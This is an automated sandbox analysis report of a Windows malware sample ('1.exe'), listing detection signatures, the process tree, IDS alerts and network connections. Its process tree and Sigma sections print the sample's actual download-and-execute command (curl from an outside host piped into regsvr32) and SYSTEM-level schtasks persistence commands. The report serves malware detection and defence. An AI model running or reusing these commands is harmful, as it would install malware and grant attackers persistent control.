Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1632500
MD5:579b4e8f3f1d1ac2b24ad60155a2f355
SHA1:ccd06a9a07fdf919160b5ee49ac055f8770110c4
SHA256:77be5500892fee02b79e58782dbb213e952d2c4badbb2ab862f3f4d304ec9b4e
Tags:exeNOBISLLCuser-SquiblydooBlog
Infos:

Detection

Score:48
Range:0 - 100
Confidence:100%

Compliance

Score:34
Range:0 - 100

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected AdvancedInstaller

Classification

Process Tree

  • System is w10x64
  • 1.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 579B4E8F3F1D1AC2B24AD60155A2F355)
    • 1.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1" MD5: 579B4E8F3F1D1AC2B24AD60155A2F355)
  • msiexec.exe (PID: 1008 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2900 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3120 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2212 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MainSoftware.exe (PID: 4512 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent MD5: 7E91C0735D8936E8572276340A6F252E)
      • schtasks.exe (PID: 4996 cmdline: "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4936 cmdline: "schtasks.exe" /run /tn "MyPersistentApp_Hourly" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SoftwareDistributor.exe (PID: 7776 cmdline: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6 MD5: 9A55270C8C060189F9F805EB78ACEB1B)
      • schtasks.exe (PID: 5456 cmdline: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MainSoftware.exe (PID: 5412 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Loop MD5: 7E91C0735D8936E8572276340A6F252E)
    • Install.exe (PID: 7260 cmdline: "C:\Program Files (x86)\Main\Chop\Install.exe" MD5: 675F1B648B3E8810A4A32FE32546490B)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5872 cmdline: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3300 cmdline: curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • regsvr32.exe (PID: 3424 cmdline: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • Install.exe (PID: 2896 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6 MD5: E34B28F5A5D88A3EA073DAB5959EF122)
  • Install.exe (PID: 5064 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6 MD5: E34B28F5A5D88A3EA073DAB5959EF122)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AdvancedInstallerYara detected AdvancedInstallerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Sigma detected: Invoke-Obfuscation VAR+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Sigma detected: Msiexec Initiated Connection
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.80.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49701
    Sigma detected: Network Connection Initiated By Regsvr32.EXE
    Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 149.154.167.220, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 3424, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49718
    Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", CommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5872, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", ProcessId: 3424, ProcessName: regsvr32.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Main\Chop\Install.exe" , ParentImage: C:\Program Files (x86)\Main\Chop\Install.exe, ParentProcessId: 7260, ParentProcessName: Install.exe, ProcessCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ProcessId: 5872, ProcessName: cmd.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-08T03:08:58.860144+010028292021A Network Trojan was detected192.168.2.549701104.21.80.136443TCP
    2025-03-08T03:09:12.361080+010028292021A Network Trojan was detected192.168.2.549703104.21.80.136443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for dropped file
    Source: C:\Program Files (x86)\Main\Chop\Install.exeReversingLabs: Detection: 31%
    Multi AV Scanner detection for submitted file
    Source: 1.exeVirustotal: Detection: 27%Perma Link
    Source: 1.exeReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\1.exeEXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exeJump to behavior
    Source: C:\Users\user\Desktop\1.exeEXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exeJump to behavior

    Compliance

    barindex
    EXE planting / hijacking vulnerabilities found
    Source: C:\Users\user\Desktop\1.exeEXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exeJump to behavior
    Source: C:\Users\user\Desktop\1.exeEXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exeJump to behavior
    Uses 32bit PE files
    Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Creates install or setup log file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior
    PE / OLE file has a valid certificate
    Source: 1.exeStatic PE information: certificate valid
    Uses secure TLS version for HTTPS connections
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
    Contains modern PE file flags such as dynamic base (ASLR) or NX
    Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Binary contains paths to debug symbols
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000010.00000002.2141976926.0000027536269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142022174.0000027536271000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
